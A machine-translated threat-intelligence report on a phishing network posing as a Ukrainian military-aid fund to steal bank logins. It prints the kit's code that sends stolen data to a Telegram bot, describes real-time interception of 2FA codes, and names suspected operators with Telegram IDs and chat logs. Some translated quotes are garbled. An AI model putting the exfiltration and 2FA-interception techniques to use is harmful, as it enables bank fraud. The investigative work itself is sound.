Kembali ke Berita
Ancaman Aktif — Laporan Investigasi

Jaringan Phishing Bantuan Militer Terungkap: 5 Bank Jadi Sasaran, Pelakunya Telah Diidentifikasi

Pipeline otomatis PhishDestroy berhasil mengurai operasi phishing yang menyamar sebagai yayasan bantuan militer Ukraina — mulai dari pendaftaran domain hingga identifikasi operator — dalam hitungan menit.

25 Maret 2026 Penelitian PhishDestroy Waktu baca: 12 menit
Tangkapan layar 1 — Gambaran umum penyelidikan: jaringan phishing dopomogvoina[.]sbs yang menargetkan para veteran militer Ukraina.
5
Bank-bank yang Menjadi Sasaran
3
Operator yang Telah Diidentifikasi
6
Panggilan API untuk Mengungkap Identitas
2
Proyek-Proyek Phishing Paralel
<30
Hanya Beberapa Menit untuk Analisis Lengkap
Pengungkapan Sponsor( klik untuk memperluas )
Memperkenalkan sponsor resmi penyelidikan ini
🏆 NiceNIC International Group Co., Limited 🏆
Yang paling yang dapat diandalkan penyedia layanan pendaftaran yang bekerja sama dengan Netcraft (dengan menipu sistem mereka) · Penyedia domain resmi untuk Pasar gelap obat-obatan Kraken · Penyedia diskon pembelian dalam jumlah besar · Penggemar setia dari "Penipu Biasa" Komunitas VK — tapi sampai sekarang belum membeli kursus tentang anonimitas
⭐ 1.8
Trustpilot
Peringkat
$200
.ru harga
120₽ (nilai sebenarnya)
0
Laporan penyalahgunaan
telah dilaksanakan
15,000%
Domain
markup
  • Meskipun mengaku sebagai orang "Tionghoa" (Hong Kong), sang pembuatnya berasal dari Gorlovka, Republik Rakyat Donetsk. Branding dalam bahasa Mandarin itu murni bersifat dekoratif — seperti Ketentuan Layanan mereka
  • Menjaga Dukungan dalam bahasa Rusia melalui VKontakte dan Telegram, menjual .ru seharga $200, sementara reg.ru mengenakan biaya 120₽ (~$1.30)
  • Ulasan negatif di Trustpilot yang menyebutkan domain pasar obat-obatan menghilang secara misterius. Kebetulan? Sama sekali tidak
  • Seorang pelanggan aktif dari "Penipu Biasa" (Penipu Tipikal) Komunitas VK — ketika penyedia layanan pendaftaran domain Anda mengikuti grup-grup penipuan, Anda tahu siapa target audiens mereka
  • Bekerja sama dengan Netcraft cukup untuk menghindari penghapusan dari daftar, sambil tetap mempertahankan infrastruktur untuk domain-domain yang terkait dengan phishing, perjudian, dan narkotika

Sementara itu, dalam acara "Типичный Мошенник":

Asli (Rusia)
Diterjemahkan (Bahasa Inggris)
Sebuah janji kepada sponsor kami: Ketika postingan ini dari "Типичный Мошенник" menjadi kenyataan — dan berdasarkan apa yang kita ketahui, itu hanya masalah waktu ketika, bukan jika — Seluruh tim kami akan mendaftar di VKontakte dan mengikuti komunitas tersebut. Anggap saja ini sebagai tepuk tangan meriah dari kami. 👏

* Ini adalah satire. NiceNIC tidak mensponsori penyelidikan ini. Namun, mereka justru memicu perlunya penyelidikan ini dengan menolak menindaklanjuti laporan penyalahgunaan yang kami ajukan selama lebih dari 5 hari. Semua yang disebutkan di atas didasarkan pada informasi yang tersedia untuk umum dan pengalaman operasional kami. Baca laporan lengkap kami tentang NiceNIC →

Temuan PhishDestroy

Pada tanggal 20 Maret 2026, Pipeline deteksi ancaman otomatis PhishDestroy mendeteksi dopomogvoina[.]sbs — sebuah domain yang baru saja didaftarkan dan menjadi tuan rumah situs phishing yang menyamar sebagai "Perisai Sang Pelindung" (Perisai Sang Pembela), sebuah yayasan bantuan militer Ukraina yang dibuat-buat. Situs tersebut menargetkan para veteran militer Ukraina, korban luka perang, dan keluarga prajurit yang gugur, dengan menjanjikan bantuan keuangan dari pemerintah sambil mencuri data akses perbankan dari lima bank terbesar di Ukraina.

Berikut ini adalah uraian lengkap mengenai semua temuan yang diungkap oleh analisis otomatis kami: teknik rekayasa sosial, infrastruktur teknis, sistem kendali operator secara real-time, serta identitas orang-orang yang mengelolanya.

Penilaian Dampak
Situs ini secara khusus menyasar kelompok yang paling rentan: para veteran perang yang menderita PTSD, keluarga prajurit yang gugur dalam tugas yang mencari bantuan pemerintah, serta personel militer yang terluka yang harus berurusan dengan sistem birokrasi yang rumit. Setiap kredensial yang dicuri dapat mengakibatkan pengambilalihan akun sepenuhnya dalam hitungan menit.

Bagian 1: Umpan — Yayasan Bantuan Militer Palsu

Domain tersebut dopomogvoina[.]sbs telah didaftarkan pada tanggal 20 Maret 2026 melalui NiceNIC International Group Co., Limited, sebuah lembaga pendaftaran domain yang memiliki riwayat yang tercatat dengan jelas mengenai respons yang lambat atau bahkan tidak ada sama sekali terhadap kasus penyalahgunaan. The .sbs TLD (Side-By-Side) adalah gTLD berbiaya rendah yang sering dimanfaatkan untuk infrastruktur phishing sekali pakai.

Situs ini menampilkan diri sebagai portal bantuan profesional yang terkait dengan pemerintah. Bendera Ukraina menghiasi bagian header, gambar-gambar bertema militer menambah kesan keaslian, dan halaman tersebut ditulis dengan cermat dalam bahasa Ukraina menggunakan gaya bahasa birokratis yang menyerupai program-program pemerintah yang sah.

Halaman utama situs phishing "dopomogvoina" yang menampilkan yayasan bantuan militer palsu
Tangkapan layar 5 — Halaman awal situs phishing yang menyamar sebagai "Щит Захисника" (Perisai Sang Pembela).

Untuk membangun kredibilitas, para operator memalsukan sebuah penghitung statistik yang ditampilkan secara mencolok di halaman beranda:

  • 2.847 permohonan — yang berarti ribuan orang telah menerima bantuan
  • ₴47,2 juta telah dibagikan — sosok yang besar namun tetap meyakinkan dalam UAH
  • 19 program — yang mengisyaratkan suatu operasi yang komprehensif dan melibatkan berbagai program

Angka-angka ini sepenuhnya dibuat-buat, ditanamkan secara permanen dalam kode sumber halaman tanpa koneksi ke server belakang. Angka-angka ini memiliki satu tujuan saja: sebagai bukti sosial untuk menghilangkan keraguan korban.

Bagian 2: Perangkap — 5 Bank, Satu Tujuan

Setelah mengklik "Подати заявку" (Kirim Permohonan), korban akan diarahkan ke layar pemilihan bank. Lima bank ritel terbesar di Ukraina muncul sebagai pilihan, masing-masing dengan merek dan logo resminya. Di sinilah teknik rekayasa sosial beralih dari manipulasi emosional ke pencurian teknis.

Layar pemilihan bank yang menampilkan 5 bank Ukraina
Tangkapan layar 6 — Layar pemilihan bank. Setiap opsi akan mengarah ke urutan pencurian kredensial yang disesuaikan.

Analisis terhadap bundel JavaScript situs tersebut menunjukkan bahwa setiap bank memiliki sebuah urutan pengumpulan kredensial bertahap yang unik, yang disesuaikan agar sesuai dengan alur otentikasi yang sebenarnya di bank tersebut:

PrivatBank

MasukKata sandiPINSMS

monobank

MasukPINSMSEmail

Oschadbank

MasukVerifikasiSMS

PUMB

MasukSMS

Ukrsibbank

MasukPINSMS

Alur serangan terhadap setiap bank mengikuti pola yang sama:

Halaman Bantuan Palsu
Pemilihan Bank
Klon Masuk
Penyadapan 2FA
Pengambilalihan Akun
Halaman login PrivatBank palsu
Tangkapan layar 7 — Halaman login PrivatBank yang dikloning.
Halaman login PUMB palsu
Tangkapan layar 9 — Halaman login PUMB yang dikloning.
Diagram alur serangan yang menggambarkan tahapan phishing, mulai dari halaman bantuan palsu hingga pengambilalihan akun
Tangkapan layar 10 — Alur serangan lengkap: mulai dari halaman bantuan militer palsu, pemilihan bank, hingga pencurian kredensial dan pengambilalihan akun.

Rangkaian teknologi: React SPA antarmuka pengguna disajikan melalui CDN Cloudflare, dengan sebuah Express.js backend yang menangani pengambilan data kredensial. Arsitektur React memungkinkan formulir bertahap yang berjalan mulus dan tampak tak dapat dibedakan dari antarmuka perbankan yang sah.

Bagian 3: Pengendalian Operator Secara Real-Time

Ini bukanlah alat pengumpul kredensial biasa yang menggunakan basis data statis. Kit phishing ini mencakup sebuah panel kontrol WebSocket langsung yang memungkinkan operator manusia mengendalikan setiap sesi korban secara real time.

Titik akhir WebSocket di wss://dopomogvoina[.]sbs/ws mendukung jenis pesan berikut:

register          — New victim session created
update_user_data  — Stolen credentials transmitted to operator
next_step         — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question   — Operator sends custom prompt to victim

Kontrol waktu nyata ini memungkinkan operator untuk:

  • Memaksa ke keadaan menunggu — menampilkan pesan "Sedang memproses permohonan Anda..." saat mereka masuk ke rekening bank asli korban
  • Mengalihkan ke langkah tertentu — minta kembali kode SMS jika kode yang pertama sudah kedaluwarsa
  • Tampilkan pesan kesalahan palsu — "Kode tidak valid, silakan masukkan kembali" untuk mengumpulkan beberapa token 2FA
  • Ajukan pertanyaan khusus — meminta tanggal lahir, nomor kartu, atau data tambahan apa pun di tengah sesi
Apa yang Membuat Hal Ini Berbahaya
Pengendalian operator secara real-time mampu mengelabui sistem perlindungan 2FA berbasis waktu. Operator tersebut menyadap kode SMS dan menggunakannya dalam jangka waktu berlakunya — biasanya 30 hingga 120 detik — sementara korban hanya menatap animasi palsu bertuliskan "sedang diproses".
Formulir pengisian nomor telepon pada halaman login bank palsu
Tangkapan layar 8 — Formulir pengisian nomor telepon yang digunakan untuk melancarkan pencurian kredensial.
Panel kontrol operator berbasis WebSocket
Tangkapan layar 11 — Panel bot waktu nyata milik operator untuk mengendalikan sesi korban.

Seluruh data yang dicuri dalam setiap sesi: phone, password, PIN, SMS code, card number, date of birth, dan email.

Bagian 4: Di Balik Layar Cloudflare — Dua Proyek, Satu Server

Proksi Cloudflare menyembunyikan server asal, tetapi Pipeline analisis infrastruktur PhishDestroy berhasil mengidentifikasi alamat IP asal yang sebenarnya: 45.131.214[.]148, diselenggarakan di RapidSeedbox / LeaseWeb di Belanda.

Sebuah detail penting: dopomogvoina[.]sbs disalurkan melalui Cloudflare, menyembunyikan alamat IP asalnya. Namun, sistem kami juga melacak hlpforvpeople[.]sbs — sebuah domain terkait yang didaftarkan melalui penyedia layanan pendaftaran domain NiceNIC yang sama dengan pola yang serupa. Domain tersebut adalah BUKAN di balik Cloudflare, yang secara langsung memperlihatkan alamat IP asalnya: 45.131.214[.]148.

Menghubungkan ke alamat IP ini secara langsung — tanpa Host judul — mengungkapkan sesuatu yang tak terduga: sebuah situs phishing yang sama sekali berbeda. Alih-alih bantuan militer Ukraina, vhost default yang disajikan "Kartu Identitas Kesehatan", sebuah operasi phishing asuransi kesehatan di Indonesia. Server yang sama, korban yang sama sekali berbeda, negara yang sama sekali berbeda.

Server yang Sama, Operator yang Sama, Korban yang Berbeda
  • Proyek 1: Bantuan militer Ukraina → mencuri data login perbankan para veteran
  • Proyek 2: Asuransi kesehatan Indonesia → mencuri data identitas layanan kesehatan warga
  • Stack Express.js yang sama, panel kontrol real-time WebSocket yang sama
  • Antarmuka pengelolaan server BT-Panel (宝塔) yang sama
  • Domain C2 pada proyek kedua: rezervtemka[.]cc — sebuah panel phishing yang sudah dikenal dan teridentifikasi dalam basis data ancaman PhishDestroy
  • Komentar dalam bahasa Rusia dalam kode sumber proyek Indonesia tersebut, para pengembang yang sama yang berbasis di CIS juga mengonfirmasi hal tersebut
Dua proyek phishing yang berjalan di server yang sama — bantuan militer Ukraina dan asuransi kesehatan Indonesia
Tangkapan layar 12 — Dua operasi phishing yang berjalan secara paralel dan menggunakan server asal yang sama: bantuan militer Ukraina (dopomogvoina) dan asuransi kesehatan Indonesia (HealthCare ID).

Template phishing Indonesia adalah sebuah kit yang diketahui telah dilacak dalam basis data intelijen ancaman PhishDestroy. Kami telah melihat varian dari templat yang persis sama ini digunakan di seluruh Asia Tenggara — yang menargetkan lembaga keuangan di Indonesia, Thailand, dan Vietnam. Para pelaku kejahatan siber cukup mengganti templat yang disesuaikan dengan negara sasaran sambil tetap menggunakan infrastruktur backend yang sama.

Penjahat yang Tidak Memilih-milih
Inilah kenyataan di balik operasi phishing modern: Para pelaku tidak peduli dari siapa mereka mencuri. Para veteran Ukraina yang mencari bantuan militer, pekerja Indonesia yang membeli asuransi kesehatan — sasarannya berubah-ubah sesuai dengan templat mana pun yang menghasilkan pendapatan terbanyak. Operator-operator berbahasa Rusia yang sama menjalankan kedua kampanye tersebut secara bersamaan dari server yang sama, berpindah-pindah antara korban di berbagai negara layaknya mengganti saluran TV. Hari ini giliran bank-bank Ukraina. Besok bisa saja giliran bank-bank Israel — seperti yang sudah ditanyakan Bonya pada Maret 2026.

Bagian 5: Berkas config.json yang Membongkar Segalanya

Inilah bagaimana satu berkas yang salah konfigurasi dapat menggagalkan seluruh operasi — langkah demi langkah.

Setelah mengidentifikasi proyek kedua dari server asal, PhishDestroy's JS Analyzer — alat kecerdasan JavaScript otomatis kami — diarahkan ke kumpulan situs phishing Indonesia di https://45.131.214[.]148/assets/index-ZMQxHb_h.js. Alat analisis tersebut mengekstrak semua titik akhir API, URL eksternal, dan jalur konfigurasi dari berkas JavaScript berukuran 335KB. Di antara temuan-temuan tersebut:

  • Lima titik akhir API di rezervtemka[.]cc — panel C2 untuk verifikasi kredensial
  • Koneksi WebSocket ke wss://rezervtemka[.]cc
  • Integrasi Facebook Pixel untuk pelacakan korban
  • Sebuah rujukan kepada /config.json — dimuat saat runtime untuk konfigurasi bot Telegram

Mengikuti petunjuk ini, kami mengambil /config.json dari alamat IP asal. Berkas tersebut dapat diakses tanpa otentikasi apa pun — terletak di direktori akar situs web, dan dapat dibaca oleh siapa saja:

async function loadConfig() {
  const response = await fetch('/config.json');
  // ...
}
async function sendNotification() {
  const cfg = await loadConfig();
  await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
    method: 'POST',
    body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
  });
}

Yang /config.json Berkas tersebut dapat diakses langsung dari alamat IP asal — tanpa otentikasi, tanpa kontrol akses, hanya berkas JSON biasa yang tersimpan di direktori akar situs web:

{
  "bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
  "chat_id": "-100XXXXXXXXXX"
}

Token bot Telegram berfungsi ganda sebagai nama pengguna dan kata sandi. Siapa pun yang memiliki token tersebut dapat melakukan panggilan API atas nama bot tersebut. Para operator meninggalkan token mereka di sebuah berkas yang dapat diakses publik. Setelah enam panggilan API, kami sudah memiliki semuanya:

getMe — Identitas bot: "MonettiCRM" (@MonettiCRM_bot)
getChat(chat_id) — Nama grup: "Idr card" dengan tautan undangan yang aktif
getChatAdministrators — 3 administrator, termasuk pembuat grup
getChat(creator_id) — Pencipta: @monettiescobar, Telegram Premium, profil bisnis, zona waktu UTC+3
getChat(admin2_id) — Admin kedua: profil kosong, diduga akun alternatif
getChatMemberCount — Total 5 anggota dalam grup operator
Rantai OSINT yang menunjukkan 6 panggilan API Telegram dari config.json hingga identifikasi lengkap operator
Tangkapan layar 13 — Rantai OSINT lengkap: mulai dari berkas config.json yang terungkap hingga identifikasi lengkap operator hanya dalam 6 panggilan API.

Mulai dari satu berkas yang salah konfigurasi hingga identifikasi lengkap operator hanya dalam enam permintaan HTTP. Tanpa eksploitasi, tanpa akses tanpa izin — hanya panggilan API Bot Telegram standar yang menggunakan token yang sengaja dibiarkan terbuka oleh para operator itu sendiri.

Bagian 6: Para Operator

Catatan tentang Kreativitas Kriminal

Berikut ini adalah contoh nyata betapa buruknya pemilihan nama alias. Kita punya MONETTI ESCOBAR — karena tak ada yang lebih mencerminkan "sikap rendah hati" daripada menamai diri sendiri dengan nama gembong narkoba paling terkenal dalam sejarah. Lalu ada Bonya, yang juga dikenal sebagai PapaZakonVor (secara harfiah "Ayah-Pencuri-Menurut-Hukum" — sebuah referensi yang dimaksudkan untuk mengacu pada hierarki kejahatan di Rusia), Boa, dan bubullikk. Dan terakhir Devoys, yang nama pengguna-nya @devosus terdengar mencurigakan seperti "dev ops us" — seorang pengembang yang mencantumkan jabatan kerjanya dalam nama pengguna. Inilah orang-orang yang mengira bisa mengelabui sistem intelijen ancaman otomatis. Spoiler: mereka tidak bisa.

Grup operator Telegram 'Idr card' terungkap melalui token bot
Tangkapan layar 14 — Grup operator Telegram "Idr card", yang terungkap melalui token bot yang bocor.
Avatar Telegram MONETTI ESCOBAR
Pemilik / Pencipta
MONETTI ESCOBAR
@monettiescobar
ID Telegram: 8135223234
Telegram Premium, Profil Bisnis
Zona waktu: UTC+3 (wilayah CIS)
10 pesan publik — OPSEC yang ketat
TraFFeeQ ChatMedusa Google AdsSaluran Deepfakes
Avatar Bonya di Telegram
Operator / Lalu Lintas
Bonya
@BoaCC159
ID Telegram: 6242202706
Juga dikenal sebagai: PapaZakonVor, Boa, bubullikk
261 pesan di 12 grup
DC2 — Amsterdam, Belanda
CryptoGrabPasar STYXRaven CCEMPIRE CHATSolusi Phoenix
Pengembang / Pemrogram
Devoys
@devosus
ID Telegram: 8213612730
Pengembang kit phishing — para operator memanggilnya "coder"
Diminta untuk "mempertimbangkan aspek keamanan" saat pelanggaran terdeteksi
Desain yang meminimalkan dampak terhadap lingkungan
Pegangan @devosus ≈ "dev ops us" — jabatan sebagai nama pengguna
Pengembang kitInfrastrukturKeamanan

MONETTI ESCOBAR — Sang Bos

MONETTI menerapkan keamanan operasional yang ketat — hanya 10 pesan publik di antara 2 kelompok. Namun, kedua kelompok tersebut menceritakan kisahnya: TraFFeeQ Chat (arbitrase lalu lintas untuk penipuan), Medusa Google Ads (Google Ads yang curang), dan sebuah Saluran Deepfakes. Profil bisnisnya di Telegram mencantumkan "Есть предложение" ("Ada usulan") — secara terbuka mengiklankan layanannya. Zona waktu UTC+3 (sama dengan Moskow/Minsk/Kyiv) dan jam operasional 24/7 menegaskan bahwa perusahaan ini berbasis di CIS dan beroperasi sepanjang waktu.

Bonya — Si Ceroboh

Berbeda dengan kebijakan OPSEC MONETTI yang ketat, Bonya (nama samaran sebelumnya: PapaZakonVor — kira-kira "DaddyThiefByLaw") meninggalkan jejak digital yang sangat banyak — 261 pesan di 12 kelompok bawah tanah. Riwayat obrolannya tampak seperti riwayat hidup seorang penjahat:

Kata-kata Bonya Sendiri (diterjemahkan dari bahasa Rusia)
  • "kabel dengan arus 2,0""Hanya upaya phishing untuk [keamanan bank] 2.0" — membahas kompatibilitas perangkat phishing dengan sistem keamanan bank yang lebih baru
  • "Sulit menemukan drop yang bagus""Sulit menemukan kurir uang yang andal" — mencari kaki tangan untuk pencairan dana
  • "Ayo kerja di pusat komunitas tempatku""Ayo bekerja di pusat layanan teleponku" — merekrut operator
  • "Ada nggak di sini orang yang pernah bekerja sama dengan bank-bank di Israel?""Adakah di sini yang pernah bekerja sama dengan bank-bank Israel?" — memperluas jangkauan ke target-target baru (Maret 2026)
  • "Aku nggak terlalu lihat logo-logo di bagian depan, sih""Tidak banyak catatan keuangan yang terlihat" — membahas kualitas kredensial yang dicuri
  • "Jika 1 proxy, 1–2 bank arus""Satu proxy untuk hanya 1–2 bank" — membahas keamanan operasional terkait penipuan perbankan
  • "Kartunya tersangkut di mesin ATM""Kartunya tertelan mesin ATM" — seorang kurir uang mencuri ₴60.000 dari mereka, dengan dalih bahwa kartu ATM-nya tertelan mesin. Bahkan para penjahat pun bisa ditipu oleh kaki tangannya sendiri.

Keanggotaannya dalam berbagai kelompok memberikan gambaran yang lengkap: CryptoGrab (penipu yang menguras dompet kripto), Pasar STYX (pasar gelap untuk data curian), Pemeriksa CC Raven (alat verifikasi kartu kredit), EMPIRE CHAT dan Solusi Phoenix (koordinasi penipuan). Ini bukanlah pelaku kejahatan yang hanya melakukan tindak kejahatan sekali saja — ini adalah seseorang yang sudah tertanam dalam ekosistem kejahatan siber.

Devoys — Pengembang

Tulang punggung teknis dari operasi tersebut. Dirancang agar jejak publiknya seminimal mungkin — ketika kelompok itu diretas, Bonya secara tegas memintanya: "@devosus, pikirkan dulu soal pertahanan sebelum kita dihajar habis-habisan""@devosus, pikirkan strategi pertahanan sebelum kita dihajar habis-habisan." Tanggapan sarkastisnya terhadap pelanggaran tersebut — "ketika di Interpol" ("kapan harus melakukan interpolasi") — menunjukkan bahwa ini bukanlah kali pertama mereka lolos dari bahaya.

Analisis Perilaku: 261 Pesan yang Diuraikan

OSINT Pipeline PhishDestroy telah mengumpulkan dan menerjemahkan keseluruhan 261 pesan publik dari Bonya melalui 12 grup Telegram bawah tanah (Juni 2024 — Maret 2026). Terjemahan mesin menggunakan API DeepL dengan koreksi konteks secara manual. Pesan-pesan tersebut mengungkap profil operasional yang lengkap — yang dikategorikan di bawah ini berdasarkan jenis kegiatan kriminal.

Distribusi Pesan: 261 pesan di 12 grup
  • 💬ONE|Obrolan — 91 pesan (koordinasi penipuan)
  • Berita Terkini/Verifikasi — 37 pesan (penipuan verifikasi)
  • Rolex | obrolan umum — 28 pesan (carding)
  • EMPIRE CHAT — 24 pesan (pasar gelap)
  • Fbstore — 23 pesan (arbitrase lalu lintas)
  • FB-DOC — 22 pesan (penipuan iklan)
  • Solusi Phoenix — 17 pesan (penipuan perbankan)
  • CryptoGrab — 11 pesan (pengosongan saldo kripto)
  • Pasar STYX — 2 pesan (pasar gelap)
  • Pemeriksa CC Raven — 2 pesan (pemeriksaan kartu)

Penipuan Perbankan & Phishing

💬ONE|ObrolanMaret 2025
"Di sini cuma ada 2,0 phish"
Dan di sini ada kabel dengan arus 2,0
Membahas kompatibilitas perangkat phishing dengan protokol keamanan bank yang lebih baru
💬ONE|ObrolanMaret 2025
"Bro, di sini mereka nggak jual apa-apa lewat phishing, itu phishing buat minta uang"
Di sini, Bratan, tidak ada yang dijual dengan chip; chip di sini hanya untuk pembayaran.
Membedakan antara phishing untuk tujuan penjualan dan phishing untuk tujuan pencurian langsung
Solusi PhoenixMaret 2026
"Adakah di sini yang pernah bekerja sama dengan bank-bank di Israel?"
Apakah ada di sini yang pernah bekerja sama dengan bank-bank di Israel?
Memperluas operasi ke sektor perbankan Israel — 5 hari sebelum penyelidikan kami
Rolex | obrolan umumSeptember 2024
"Jika hanya 1 wakil, maka hanya 1–2 bank"
Jika 1 proxy untuk 1–2 bank arus
Keamanan operasional dalam penipuan yang melibatkan beberapa bank: satu proxy untuk setiap 1–2 bank guna menghindari deteksi
Rolex | obrolan umumSeptember 2024
"Sepertinya tidak banyak catatan keuangan yang terlihat"
Aku nggak terlalu lihat logo-logo di bagian depan, sih
Mengeluhkan kualitas kredensial perbankan yang dicuri di pasar gelap

Kurir Uang & Penarikan Tunai

💬ONE|ObrolanMaret 2025
"Tetesan yang bagus sulit didapat"
Drops yang bagus juga sulit ditemukan
"Drops" = kurir uang yang mencairkan dana hasil curian. Mengeluh tentang kesulitan dalam merekrut anggota.
💬ONE|ObrolanMaret 2025
"Ayo bekerja di pusat layanan pelanggan saya"
Ayo datang ke pusat komunitas untuk bekerja bersamaku
Secara aktif merekrut orang untuk bergabung dalam operasi pusat panggilan penipuan
Berita TerkiniJuni 2024
"Kami kehilangan 60 ribu"
Kami kehilangan 60 ribu
Seorang kurir uang mencuri ₴60.000 dari para penipu itu sendiri. Keadilan yang ironis.
Berita TerkiniJuni 2024
"Gimana sih bisa ATM-nya menelan kartunya?"
Gimana sih bisa ATM itu menelan kartu?
Si kurir itu mengklaim bahwa ATM tersebut "menelan" kartunya untuk menguasai uang hasil curian itu. Penipu yang menipu penipu.
Berita TerkiniJuni 2024
"Dia mentransfernya ke kami, tapi kami tidak punya saluran utama untuk mentransfer uang itu"
Dia mengalihkannya ke kami, tapi saat itu kami tidak punya dompet digital utama untuk mentransfer uang
Penjelasan mengenai rantai pencairan dana: korban → rekening perantara → kurir uang utama

Penipuan Lalu Lintas & Penyalahgunaan Iklan

EMPIRE CHATMaret 2026
"Aku nggak pakai Google, cuma Facebook aja"
Yah, aku nggak pakai Google, cuma pakai Facebook aja
Mengkhususkan diri dalam penipuan iklan Facebook — mengarahkan lalu lintas ke halaman phishing
FB-DOCFebruari 2026
"Aku juga nggak bakal mengalokasikan % dari anggaran iklan tanpa adanya penjamin"
Saya juga tidak akan memberikan komisi berdasarkan persentase dari pengeluaran tanpa jaminan
Menegosiasikan ketentuan pembayaran untuk menjalankan kampanye iklan Facebook yang menipu
CryptoGrabJanuari 2025
"Saya mencoba AML di Facebook untuk menargetkan pasar Amerika — tapi tidak menemukan pengaturan yang bagus di internet"
Saya sudah mencoba mencari informasi tentang AML di Facebook, tapi di internet pun saya tidak menemukan sumber yang bisa diandalkan, bahkan yang sudah lama sekalipun.
Upaya memanfaatkan iklan Facebook untuk menjalankan penipuan terkait anti-pencucian uang yang menargetkan korban di AS
Profil Psikologis: Bonya

Korpus yang terdiri dari 261 pesan tersebut menunjukkan sebuah penjahat siber kelas menengah dengan berbagai jenis kegiatan: penipuan perbankan (phishing), jaringan pencucian uang, penipuan iklan Facebook, pencurian aset kripto, dan penipuan kartu kredit. Ciri-ciri utama:

  • Kelalaian operasional — 261 pesan di berbagai grup publik menggunakan satu akun. Penggunaan beberapa nama samaran (PapaZakonVor → Boa → Bonya) menunjukkan kesadaran akan OPSEC, namun kegagalan dalam menerapkannya
  • Pola Pikir dalam Rekrutmen — secara aktif mengajak orang untuk "bekerja di pusat layanan pelanggan saya" dan menjual pengetahuan operasional demi uang tunai
  • Ketidakpedulian terhadap korban — membahas sasaran-sasaran di Ukraina, Eropa, Israel, dan Amerika Serikat dengan sikap yang sama-sama netral. Geografi hanyalah salah satu variabel dalam persamaan penipuan ini
  • Masalah kepercayaan — dikhianati oleh kurir uangnya sendiri demi ₴60K. Hal ini secara ironis mencerminkan rasa tidak percaya yang ia timbulkan pada para korbannya
  • Didorong oleh ekspansi — bahkan baru-baru ini, pada Maret 2026, mereka secara aktif mencari pasar perbankan baru (Israel), yang mengindikasikan bahwa serangan phishing di Ukraina hanyalah salah satu dari banyak operasi yang berlangsung secara bersamaan
Bonya: Riwayat Pesan Lengkap (253 pesan di 12 grup)
Bonya (@BoaCC159) — Riwayat Pesan Terjemahan Lengkap
-- Phoenix Solution (16 pesan) --
B
Bonya2026-03-17 14:22
Adakah di sini yang pernah bekerja sama dengan bank-bank di Israel?Apakah ada di sini yang pernah bekerja sama dengan bank-bank di Israel?
B
Bonya2026-03-17 14:22
bekerja dengan tenang juga.kami juga bekerja secara diam-diam
B
Bonya2026-03-17 14:17
Apa kabar?Apa kabar?
B
Bonya2026-03-17 14:17
Halo semuanyaHalo semuanya
B
Bonya2026-03-15 19:02
Nah, sekarang semuanya sudah hampir selesai diperbaiki.Yah, secara keseluruhan semuanya sudah beres
B
Bonya2026-03-15 19:02
Yah, ini memang agak merepotkanYah, jadi mereka bikin sedikit keributan
B
Bonya2026-03-15 19:01
Iya, aku juga udah banyak ngelakuin kerjaan di belakang layar, kacau banget.Ya, aku juga udah bener-bener bosan banget sama kerjaan yang diam-diam ini
B
Bonya2026-03-15 19:00
Bagaimana hari liburmu?Bagaimana hari liburnya?
B
Bonya2026-03-15 19:00
Kalian semua.Untuk semua orang
B
Bonya2026-03-14 14:29
Dia tidak lagi begitu anonim sekarang karena semua orang sudah tahu bahwa itu adalah Marik.Dia sebenarnya sudah tidak bisa dibilang anonim lagi, soalnya semua orang sudah tahu siapa dia
B
Bonya2026-03-14 14:24
Terlahir KembaliTerlahir Kembali
B
Bonya2026-03-14 14:24
Ahahahahahahahahahahahahahahahahahahahahahahahahah.Ahahahahahahahah
B
Bonya2026-03-14 14:23
Aku kecewa saat melihat ruang obrolan itu sudah tidak ada lagi.Aku sampai kecewa saat melihat bahwa obrolan itu hilang
B
Bonya2026-03-14 14:22
Aku kira aku takkan pernah menemukanmu.Aku sudah kira tidak akan menemukan kalian
B
Bonya2026-03-14 14:22
KooКу
B
Bonya2026-03-14 14:22
SialSial
-- 👨‍⚕️ FB-DOC — Obrolan tentang Arbitrase Lalu Lintas (21 pesan) --
B
Bonya2026-03-15 07:23
@fbdoc21@fbdoc21
B
Bonya2026-03-15 07:20
Pukul dahi kamu sendiri pakai penismu.Menggosok-gosokkan penis ke dahi sendiri
B
Bonya2026-03-06 15:18
Seperti angka lima di layar 2,5😂.Persis seperti yang terlihat di tangkapan layar 2,5😂
B
Bonya2026-02-19 17:05
kepada kalian semua.Salam untuk kalian semua
B
Bonya2026-02-19 17:04
Kalau kamu membuka transaksi, aku bakal ketawa.Kalau kamu membuka posisi, aku bakal ketawa
B
Bonya2026-02-19 17:04
kontinental?kontinental?
B
Bonya2026-02-19 17:04
Nah, itulah dia.Nah, ternyata dia setuju
B
Bonya2026-02-19 17:01
Jadi, selalu lakukan pemeriksaan terlebih dahulu saat Anda menanyakan soal penjamin.Jadi, simpanlah selalu saat Anda menanyakan soal garansi
B
Bonya2026-02-19 17:00
Dia menanyakan soal penjamin, lalu langsung menghilang.Dia baru saja bertanya soal penjamin, lalu langsung menghilang
B
Bonya2026-02-19 17:00
Ay, CarinaHai, Karina
B
Bonya2026-02-19 16:59
Jadi, kamu mau mencari penjamin?Jadi, kamu mau jadi penjamin?
B
Bonya2026-02-19 16:57
Aku juga nggak bakal memberikan pinjaman berdasarkan persentase pengeluaran tanpa adanya penjamin.Saya juga tidak akan memberikan komisi berdasarkan persentase dari pengeluaran tanpa jaminan
B
Bonya2026-02-19 16:57
Aku?Aku?
B
Bonya2026-02-19 16:57
Yah, dia mengirimkan tangkapan layar, tapi kamu nggak ngasih apa-apa ke aku.Nah, dia sudah membagikan tangkapan layarnya, tapi kamu belum memberikan apa-apa
B
Bonya2026-02-19 16:56
lihat tangkapan layar yang dia bagikanLihat tangkapan layar yang dia kirim
B
Bonya2026-02-19 16:55
Apakah dia tidak menulis tentang penjamin?Apakah dia tidak menulis tentang penjamin?
B
Bonya2026-02-19 16:54
Kamu itu aneh banget😂Kamu ini aneh banget, ya? 😂
B
Bonya2026-02-19 16:53
Kamu meminta penjamin.Kamu sudah meminta jaminan, kan?
B
Bonya2026-02-19 16:52
di manadi mana saja
B
Bonya2026-02-17 14:37
Siapa yang bisa nyediain mobil-mobil bagus buat toko ini?Siapa yang mau jual mobil bekas dengan kondisi bagus?
B
Bonya2026-02-17 12:10
Di mana pun kamu mau, mereka akan melakukannya untukmu😂Di mana pun yang kamu suka, mereka pasti bakal bikin buat kamu😂
-- EMPIRE CHAT (24 pesan) --
B
